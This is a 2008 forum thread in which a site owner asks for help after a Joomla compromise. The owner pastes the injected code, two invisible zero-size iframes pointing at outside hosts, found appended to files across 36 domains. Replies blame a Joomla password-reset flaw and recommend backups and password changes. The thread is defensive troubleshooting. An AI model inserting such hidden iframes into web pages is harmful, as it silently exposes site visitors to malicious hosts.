My pages was infected - PLEASE HELP!

Discussion in 'General' started by biznes24, Aug 18, 2008.

  1. biznes24

    biznes24 New Member

    Hi,

    My side was infected by added code to end of line to all file on catalogue web.
    The code what cracker put is
    PHP:
    <iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    What I can do now? I have 36 domains infected. What is command to ubuntu to remove all this line code in all domains? How I can security from this next time?

    rgds
     
  2. Ben

    Ben Active Member Moderator

    Looks like you have any bad coded software, not escaping input receiving from a user. On what pages do you find that code? E.g. if this is a forum you have to look inside the databse and not in specific files.

    And there won't be a "command" to erase those lines and safe your server in the future.
    At first you have to analyse where those lines occur, so that you can find the weak parts in your server.
     
  3. biznes24

    biznes24 New Member

    I find in my joomla 1.5.6 all files. Find in page when creat new domains in ispconfig please look:
    PHP:
    <HTML>
    <
    HEAD>
    <
    TITLE>Welcome!</TITLE>
    </
    HEAD>
    <
    BODY BGCOLOR="#FFFFFF" leftMargin=0 topMargin=0 rightMargin=0 marginheight="0" marginwidth="0">
    <
    CENTER>
    <
    TABLE BORDER="0" WIDTH="100%" CELLSPACING="0">
      <
    TR>
        <
    TD BGCOLOR="#025CCA" ALIGN="CENTER">
        <
    HR SIZE="1" COLOR="#FFFFFF">
        <
    TABLE>
          <
    TR>

                <
    TD><FONT SIZE="3" COLOR="#FFFFFF" FACE="Helvetica, Arial"><B>Welcome
                  to
                  
    <!--ADRESSE//-->www<!--ADRESSE//-->
                  
    </B></FONT></TD>
          </
    TR>
        </
    TABLE>
        <
    HR SIZE="1" COLOR="#FFFFFF">
        </
    TD>
      </
    TR>
      <
    TR>

        <
    TD BGCOLOR="#FFFFFF">
        <
    BR><BR><CENTER>
            <
    FONT COLOR="#000000" SIZE="2" FACE="Helvetica, Arial">This is the standard index of your websiteYou can easily delete it or replace it with another fileThis is the index.html file
            in the 
    <B>web</Bdirectory.
            <
    P>For questions or problems please contact the server administrator.</FONT> </CENTER>
              <
    BR>

            <
    HR SIZE="1" WIDTH="90%">

          <
    CENTER>
    <
    FONT SIZE="1" COLOR="#000000" FACE="Verdana, Arial">powered by <A HREF="http://www.ispconfig.org">ISPConfig</A></FONT>
          </
    CENTER>
        </
    TD>
      </
    TR>
    </
    TABLE>
    </
    CENTER>
    </
    BODY>
    </
    HTML><iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    What now if I remove?. He back and infected again? Becouse he infected random domains in 14-08-2008
     
  4. gdaddy

    gdaddy New Member

    You're better off to go to the Joomla security forums and join the other 100's of I've been hacked posts. If just one of your sites, even a test domain was not running Joomla 1.5.6 on the 14/8/8 then they will have got through the token length password reset vulnerability.

    If your username was admin for any one of those sites that will be how they got in. They reset the password, to the 1st user, which by default is admin.

    Don't feel too bad though, even Joomla.org got hit. But in essence, you are going to have to change all passwords to Joomla, Mysql and FTP at a minimum. Probably best to do users and ISP config as well.

    In terms of getting rid of it, restore files from backup (big props to Joomlapack here), your content should be OK, this hack targets index.php and or template.php. Given that what you are showing is exactly like the other Joomla hacks, I doubt this is much to do with ISPConfig. Joomla forums will help you better.
     
    Last edited: Aug 18, 2008
  5. gdaddy

    gdaddy New Member

    Oh and I see they have got to the default ISP Config files, once again restore from backup for ISP config, but provided you make sure everything is 1.5.6 and you just restore the php files that create the standard ISPConfig pages, you should be OK.
     

Share This Page